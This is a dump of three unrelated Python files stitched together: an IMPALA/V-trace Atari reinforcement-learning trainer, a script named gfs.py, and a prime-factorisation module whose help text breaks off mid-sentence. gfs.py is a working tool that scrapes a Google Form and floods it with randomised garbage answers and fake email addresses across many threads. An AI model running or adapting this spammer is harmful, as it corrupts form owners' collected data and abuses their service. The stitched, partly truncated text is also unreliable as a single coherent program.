parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
def _format_frame(frame):
frame = torch.from_numpy(frame)
return frame.view((1, 1) + frame.shape) # (...) -> (T,B,...).
class Environment:
def __init__(self, gym_env):
self.gym_env = gym_env
self.episode_return = None
self.episode_step = None
def initial(self):
initial_reward = torch.zeros(1, 1)
# This supports only single-tensor actions ATM.
initial_last_action = torch.zeros(1, 1, dtype=torch.int64)
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
initial_done = torch.ones(1, 1, dtype=torch.uint8)
initial_frame = _format_frame(self.gym_env.reset())
return dict(
frame=initial_frame,
reward=initial_reward,
done=initial_done,
episode_return=self.episode_return,
episode_step=self.episode_step,
last_action=initial_last_action,
)
def step(self, action):
frame, reward, done, unused_info = self.gym_env.step(action.item())
self.episode_step += 1
self.episode_return += reward
episode_step = self.episode_step
episode_return = self.episode_return
if done:
frame = self.gym_env.reset()
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
frame = _format_frame(frame)
reward = torch.tensor(reward).view(1, 1)
done = torch.tensor(done).view(1, 1)
return dict(
frame=frame,
reward=reward,
done=done,
episode_return=episode_return,
episode_step=episode_step,
last_action=action,
)
def close(self):
self.gym_env.close()
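
# A minimal sketch (never called) of the Environment wrapper above: every tensor
# in the dicts it returns carries a leading (T=1, B=1) shape, which is what
# _format_frame and the rollout buffers below expect. It assumes gym and the
# Atari ROMs are installed; any NoFrameskip Atari id would do.
def _environment_usage_example():
    env = Environment(make_atari("PongNoFrameskip-v4"))
    first = env.initial()
    assert first["frame"].shape[:2] == (1, 1)
    nxt = env.step(torch.zeros(1, 1, dtype=torch.int64))  # action 0 = NOOP
    assert nxt["reward"].shape == (1, 1)
    env.close()
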
import collections
import torch
import torch.nn.functional as F
VTraceFromLogitsReturns = collections.namedtuple(
"VTraceFromLogitsReturns",
[
"vs",
"pg_advantages",
"log_rhos",
"behavior_action_log_probs",
"target_action_log_probs",
],
)
VTraceReturns = collections.namedtuple("VTraceReturns", "vs pg_advantages")
def action_log_probs(policy_logits, actions):
return -F.nll_loss(
F.log_softmax(torch.flatten(policy_logits, 0, -2), dim=-1),
torch.flatten(actions),
reduction="none",
).view_as(actions)
def from_logits(
behavior_policy_logits,
target_policy_logits,
actions,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace for softmax policies."""
target_action_log_probs = action_log_probs(target_policy_logits, actions)
behavior_action_log_probs = action_log_probs(behavior_policy_logits, actions)
log_rhos = target_action_log_probs - behavior_action_log_probs
vtrace_returns = from_importance_weights(
log_rhos=log_rhos,
discounts=discounts,
rewards=rewards,
values=values,
bootstrap_value=bootstrap_value,
clip_rho_threshold=clip_rho_threshold,
clip_pg_rho_threshold=clip_pg_rho_threshold,
)
return VTraceFromLogitsReturns(
log_rhos=log_rhos,
behavior_action_log_probs=behavior_action_log_probs,
target_action_log_probs=target_action_log_probs,
**vtrace_returns._asdict(),
)
@torch.no_grad()
def from_importance_weights(
log_rhos,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace from log importance weights."""
with torch.no_grad():
rhos = torch.exp(log_rhos)
if clip_rho_threshold is not None:
clipped_rhos = torch.clamp(rhos, max=clip_rho_threshold)
else:
clipped_rhos = rhos
cs = torch.clamp(rhos, max=1.0)
# Append bootstrapped value to get [v1, ..., v_t+1]
values_t_plus_1 = torch.cat(
[values[1:], torch.unsqueeze(bootstrap_value, 0)], dim=0
)
deltas = clipped_rhos * (rewards + discounts * values_t_plus_1 - values)
acc = torch.zeros_like(bootstrap_value)
result = []
for t in range(discounts.shape[0] - 1, -1, -1):
acc = deltas[t] + discounts[t] * cs[t] * acc
result.append(acc)
result.reverse()
vs_minus_v_xs = torch.stack(result)
# Add V(x_s) to get v_s.
vs = torch.add(vs_minus_v_xs, values)
# Advantage for policy gradient.
broadcasted_bootstrap_values = torch.ones_like(vs[0]) * bootstrap_value
vs_t_plus_1 = torch.cat(
[vs[1:], broadcasted_bootstrap_values.unsqueeze(0)], dim=0
)
if clip_pg_rho_threshold is not None:
clipped_pg_rhos = torch.clamp(rhos, max=clip_pg_rho_threshold)
else:
clipped_pg_rhos = rhos
pg_advantages = clipped_pg_rhos * (rewards + discounts * vs_t_plus_1 - values)
# Make sure no gradients backpropagated through the returned values.
return VTraceReturns(vs=vs, pg_advantages=pg_advantages)
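
# A minimal sketch (never called) of exercising the V-trace helpers above with
# toy [T, B] tensors; the values are random and only illustrate the expected
# shapes, not meaningful training data.
def _vtrace_usage_example():
    T, B, num_actions = 5, 2, 4
    returns = from_logits(
        behavior_policy_logits=torch.randn(T, B, num_actions),
        target_policy_logits=torch.randn(T, B, num_actions),
        actions=torch.randint(num_actions, (T, B)),
        discounts=torch.full((T, B), 0.99),
        rewards=torch.randn(T, B),
        values=torch.randn(T, B),
        bootstrap_value=torch.randn(B),
    )
    assert returns.vs.shape == (T, B)
    assert returns.pg_advantages.shape == (T, B)
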
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
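
# A minimal sketch (never called) of the loss helpers above on toy [T, B]
# tensors; each one reduces to a scalar that can be summed into total_loss.
def _loss_helpers_example():
    T, B, num_actions = 4, 2, 6
    logits = torch.randn(T, B, num_actions)
    actions = torch.randint(num_actions, (T, B))
    advantages = torch.randn(T, B)
    assert compute_baseline_loss(advantages).dim() == 0
    assert compute_entropy_loss(logits).dim() == 0
    assert compute_policy_gradient_loss(logits, actions, advantages).dim() == 0
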
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
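
# A minimal sketch (never called) of a single AtariNet forward pass on dummy
# inputs shaped like the rollout buffers: frames are [T, B, C, H, W] with C=4
# stacked 84x84 grayscale frames, which is what the DeepMind wrappers produce.
def _atari_net_usage_example():
    T, B, num_actions = 2, 3, 6
    net = AtariNet(observation_shape=(4, 84, 84), num_actions=num_actions, use_lstm=True)
    inputs = dict(
        frame=torch.zeros(T, B, 4, 84, 84, dtype=torch.uint8),
        reward=torch.zeros(T, B),
        done=torch.zeros(T, B, dtype=torch.bool),
        last_action=torch.zeros(T, B, dtype=torch.int64),
    )
    outputs, core_state = net(inputs, net.initial_state(batch_size=B))
    assert outputs["policy_logits"].shape == (T, B, num_actions)
    assert outputs["baseline"].shape == (T, B)
    assert outputs["action"].shape == (T, B)
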
def create_env(flags):
return wrap_pytorch(
wrap_deepmind(
make_atari(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
flags = parser.parse_args()
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
global step, stats
timings = Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
actor_model = model
initial_agent_state = agent_state
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = learner_model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(learner_model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(learner_model.state_dict())
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
# plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
pass
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
|
gfs.py
|
import re
import ast
import time
import random
import string
import requests
import argparse
from enum import Enum
from rich import print
from queue import Queue
from threading import Thread
from tabulate import tabulate
from bs4 import BeautifulSoup
from typing import Dict, List
class FieldType(Enum):
"""
    An enum of the Google Form field types handled by this script
"""
SHORT_TEXT = 0
LONG_TEXT = 1
MULTIPLE_CHOICE = 2
CHECKBOX = 3
DROPDOWN = 4
LINEAR_SCALE = 5
MULTI_CHOICE_GRID = 7
DATE = 9
TIME = 10
class Field(object):
"""
A Field object used to define fields
"""
validation: bool
required: bool
has_choices: bool
def __init__(self):
self.type = None
self.name = None
self.id = None
self.choices = []
class Choice(object):
"""
A Choice object used to define choices
"""
def __init__(self):
self.choice_name = None
class GoogleFormSpammerException(Exception):
"""
A class to be raised when errors occur
"""
pass
class GoogleFormSpammer:
"""
A class to hold all functions for the script
"""
def __init__(self, form_url: str = None, required_only: bool = False) -> None:
"""
The class constructor
Parameters:
form_url (str): The URL of the form to be used
required_only (bool): If you only want to fill in the required fields
Raises:
GoogleFormSpammerException: If `form_url` is None or if it is not a valid form url
"""
if form_url is None:
raise GoogleFormSpammerException("form_url cannot be None")
if not re.match(
"https://docs.google.com/forms/d/e/[A-Za-z0-9_-]{56}/formResponse", form_url
):
raise GoogleFormSpammerException("form_url is not valid")
self.form_url = form_url
self.required_only = required_only
self.scraped_data = self._scrape_form()
def _scrape_form(self) -> List[Field]:
"""
A function to scrape the form to get all the required post data
Returns:
fields (List[Field]): A list of fields from the scraped form data
"""
response = requests.get(self.form_url)
soup = BeautifulSoup(response.text, "html.parser")
divs = soup.find_all("div")
replacements = {
"%.@.": "[",
"null": '"null"',
"true": '"true"',
"false": '"false"',
}
fields = []
for div in divs:
# Find all div tags with the attribute `jsmodel`
if "jsmodel" in div.attrs.keys():
data_params = div.attrs.get("data-params")
# Fix array so it can be handled by Python
for old, new in replacements.items():
data_params = data_params.replace(old, new)
# Literal eval the string list
data_params_eval = ast.literal_eval(data_params)
response_data = data_params_eval[0][4]
# Create a new Field object for each field we come across
field = Field()
# Populate the attributes with the parsed field data
field.type = FieldType(data_params_eval[0][3])
field.name = data_params_eval[0][1]
field.id = response_data[0][0]
field.validation = len(response_data[0][4]) > 0
field.required = True if response_data[0][2] == "true" else False
field.has_choices = False
if len(response_data[0][1]) > 0:
choices = []
for raw_choice in response_data[0][1]:
choice = Choice()
choice.choice_name = raw_choice[0]
choices.append(choice)
field.has_choices = len(choices) > 0
field.choices = choices
fields.append(field)
return fields
def generate_post_data(self, data_length: int = 50) -> Dict[str, str]:
"""
        A function to generate randomised post data for the scraped form fields
Parameters:
data_length (int): The length of the garbage data that is sent
Returns:
post_data (Dict[str, str]): A dictionary of the post data
"""
post_data = {}
chars = string.ascii_letters + string.digits
scraped_form_data = self.scraped_data
        # If only the required fields were requested, restrict to those
if self.required_only:
scraped_form_data = [field for field in self.scraped_data if field.required]
for field in scraped_form_data:
# To support the date and time fields we must make a specific case for each
if field.type == FieldType.TIME:
post_data[f"entry.{field.id}_hour"] = f"{random.randint(0, 23):02d}"
post_data[f"entry.{field.id}_minute"] = f"{random.randint(0, 59):02d}"
elif field.type == FieldType.DATE:
post_data[f"entry.{field.id}_year"] = str(random.randint(2000, 2022))
post_data[f"entry.{field.id}_month"] = str(random.randint(1, 12))
post_data[f"entry.{field.id}_day"] = str(random.randint(1, 31))
else:
                # Email fields are the only ones with validation here, so generate a random address
if field.validation:
email_providers = [
"yahoo.com",
"hotmail.com",
"outlook.net",
"gmail.com",
]
selected_choice = "".join(random.choice(chars) for _ in range(data_length)) + "@" + random.choice(email_providers)
elif field.has_choices:
selected_choice = random.choice(field.choices).choice_name
else:
selected_choice = "".join(
random.choice(chars) for _ in range(data_length)
)
post_data[f"entry.{field.id}"] = selected_choice
return post_data
def post_data(self) -> int:
"""
A function to post the data to the form
Returns:
response.status_code (int): An integer stating the HTTP status code of the response
"""
response = requests.post(self.form_url, params=self.generate_post_data())
return response.status_code
def threader(self) -> None:
"""
A function to be used as a target function in the threading
"""
while True:
_ = queue.get()
self.post_data()
queue.task_done()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="A script to spam Google Forms with garbage data")
parser.add_argument("-u", "--url", type=str, required=True, help="The url of the google form")
parser.add_argument("-o", "--required", type=bool, default=False, help="If you only want to fill in the required fields")
parser.add_argument("-r", "--requests", type=int, default=500, help="The amount of requests to execute")
parser.add_argument("-t", "--threads", type=int, default=50, help="The amount of threads to use")
args = parser.parse_args()
if args.url is None:
print(f"[bold #F04349][-] Invalid argument, supply a form url[/bold #F04349]")
exit(-1)
print("")
print("[bold #FC970F][~] Starting spammer...[/bold #FC970F]\n")
parameter_table = tabulate(
[
["URL", args.url],
["Requests", args.requests],
["Threads", args.threads],
["Required Fields", args.required],
],
tablefmt="pretty",
colalign=("center", "left"),
)
print(f"[bold #F2B44B]{parameter_table}[/bold #F2B44B]\n")
spammer = GoogleFormSpammer(args.url, args.required)
start = time.perf_counter()
queue = Queue()
for _ in range(args.threads):
worker = Thread(target=spammer.threader)
worker.daemon = True
worker.start()
for request_worker in range(args.requests):
queue.put(request_worker)
queue.join()
total_time = round(time.perf_counter() - start, 2)
req_per_sec = round(args.requests / total_time, 3)
print("[bold #07FA1C][=] Spammer finished![/bold #07FA1C]\n")
results_table = tabulate(
[
["Execution Time", f"{total_time}s"],
["Speed", f"{req_per_sec} req/s"]
],
tablefmt="pretty",
colalign=("center", "left"),
)
print(f"[bold #31EE42]{results_table}[/bold #31EE42]\n")
|
primefac.py
|
#! /usr/bin/env python
from __future__ import print_function, division
from threading import Timer
import _primefac
# Note that the multiprocessing incurs relatively significant overhead.
# Only call this if n is proving difficult to factor.
def kill_procs(procs):
for p in procs:
p.terminate()
def multifactor(n, methods=(_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1,
_primefac.ecm, _primefac.mpqs, _primefac.fermat, _primefac.factordb), verbose=False, timeout=59):
from multiprocessing import Process, Queue as mpQueue
from six.moves import xrange, reduce
import six
def factory(method, n, output):
try:
g = method(n)
except OverflowError:
return None
if g is not None:
output.put((g, str(method).split()[1]))
factors = mpQueue()
procs = [Process(target=factory, args=(m, n, factors)) for m in methods]
timer = Timer(timeout, kill_procs, [procs])
try:
timer.start()
for p in procs:
p.start()
(f, g) = factors.get()
for p in procs:
try:
p.terminate()
except:
pass
finally:
timer.cancel()
if verbose:
names = {"pollardRho_brent": "prb",
"pollard_pm1": "p-1",
"williams_pp1": "p+1"}
if g in names:
name = names[g]
else:
name = g
print("\033[1;31m" + name + "\033[;m", end=' ')
stdout.flush()
return f
'''
Obtains a complete factorization of n, yielding the prime factors as they are
obtained. If the user explicitly specifies a splitting method, use that method.
Otherwise,
1. Pull out small factors with trial division.
2. Do a few rounds of Pollard's rho algorithm.
TODO: a few rounds of ECM by itself?
TODO: a certain amount of P-1?
3. Launch multifactor on the remainder. Multifactor has enough overhead that
we want to be fairly sure that rho isn't likely to yield new factors soon.
The default value of rho_rounds=42000 seems good for that but is probably
overkill.
'''
def primefac(n, trial_limit=1000, rho_rounds=42000, verbose=False,
methods=(_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1, _primefac.ecm, _primefac.mpqs,
_primefac.fermat, _primefac.factordb), timeout=60):
    from _primefac import isprime, isqrt, primegen
    from six.moves import xrange, reduce
    from random import randrange
    import six
    try:
        from math import gcd  # Python 3.5+
    except ImportError:  # Python 2
        from fractions import gcd
timeout = timeout - 1
if n < 2:
return
if isprime(n):
yield n
return
factors, nroot = [], isqrt(n)
# Note that we remove factors of 2 whether the user wants to or not.
for p in primegen():
if n % p == 0:
while n % p == 0:
yield p
n //= p
nroot = isqrt(n)
if isprime(n):
yield n
return
if p > nroot:
if n != 1:
yield n
return
if p >= trial_limit:
break
if isprime(n):
yield n
return
if rho_rounds == "inf":
factors = [n]
while len(factors) != 0:
n = min(factors)
factors.remove(n)
f = _primefac.pollardRho_brent(n)
if isprime(f):
yield f
else:
factors.append(f)
n //= f
if isprime(n):
yield n
else:
factors.append(n)
return
factors, difficult = [n], []
while len(factors) != 0:
rhocount = 0
n = factors.pop()
try:
g = n
while g == n:
x, c, g = randrange(1, n), randrange(1, n), 1
y = x
while g == 1:
if rhocount >= rho_rounds:
raise Exception
rhocount += 1
x = (x**2 + c) % n
y = (y**2 + c) % n
y = (y**2 + c) % n
g = gcd(x-y, n)
# We now have a nontrivial factor g of n. If we took too long to get here, we're actually at the except statement.
if isprime(g):
yield g
else:
factors.append(g)
n //= g
if isprime(n):
yield n
else:
factors.append(n)
except Exception:
difficult.append(n) # Factoring n took too long. We'll have multifactor chug on it.
factors = difficult
while len(factors) != 0:
n = min(factors)
factors.remove(n)
f = multifactor(n, methods=methods, verbose=verbose, timeout=timeout)
if isprime(f):
yield f
else:
factors.append(f)
n //= f
if isprime(n):
yield n
else:
factors.append(n)
def factorint(n, trial_limit=1000, rho_rounds=42000, methods=(_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1, _primefac.ecm, _primefac.mpqs, _primefac.fermat, _primefac.factordb)):
out = {}
for p in primefac(n, trial_limit=trial_limit, rho_rounds=rho_rounds, methods=methods):
out[p] = out.get(p, 0) + 1
return out
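
# A minimal sketch (never called) of using the generators above from Python
# rather than from the command line. 5040 = 2**4 * 3**2 * 5 * 7, so trial
# division alone finishes the job; this assumes the _primefac helpers
# (isprime, isqrt, primegen, ...) behave as in the original primefac package.
def _primefac_usage_example():
    assert sorted(primefac(5040)) == [2, 2, 2, 2, 3, 3, 5, 7]
    assert factorint(5040) == {2: 4, 3: 2, 5: 1, 7: 1}
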
usage = """
This is primefac-fork version 1.1.
USAGE:
primefac [-vs|-sv] [-v|--verbose] [-s|--summary] [-t=NUM] [-r=NUM]
[-m=[prb][,p-1][,p+1][,ecm][,mpqs][,fermat][,factordb]] rpn
"rpn" is evaluated using integer arithmetic. Each number that remains on
the stack after evaluation is then factored.
"-t" is the trial division limit. Default == 1000. Use "-t=inf" to use
trial division exclusively.
"-r" is the number of rounds of _primefac.pollard's rho algorithm to try before
calling a factor "difficult". Default == 42,000. Use "-r=inf" to use
    Pollard's rho exclusively once the trial division is completed.
If verbosity is invoked, we indicate in the output which algorithm produced
which factors during the multifactor phase.
If the summary flag is absent, then output is identical to the output of the
GNU factor command, except possibly for the order of the factors and, if
verbosity has been turned on, the annotations indicating which algorithm
produced which factors.
If the summary flag is present, then output is modified by adding a single
newline between each item's output, before the first, and after the last.
Each item's output is also modified by printing a second line of data
summarizing the results by describing the number of decimal digits in the
input, the number of decimal digits in each prime factor, and the factors'
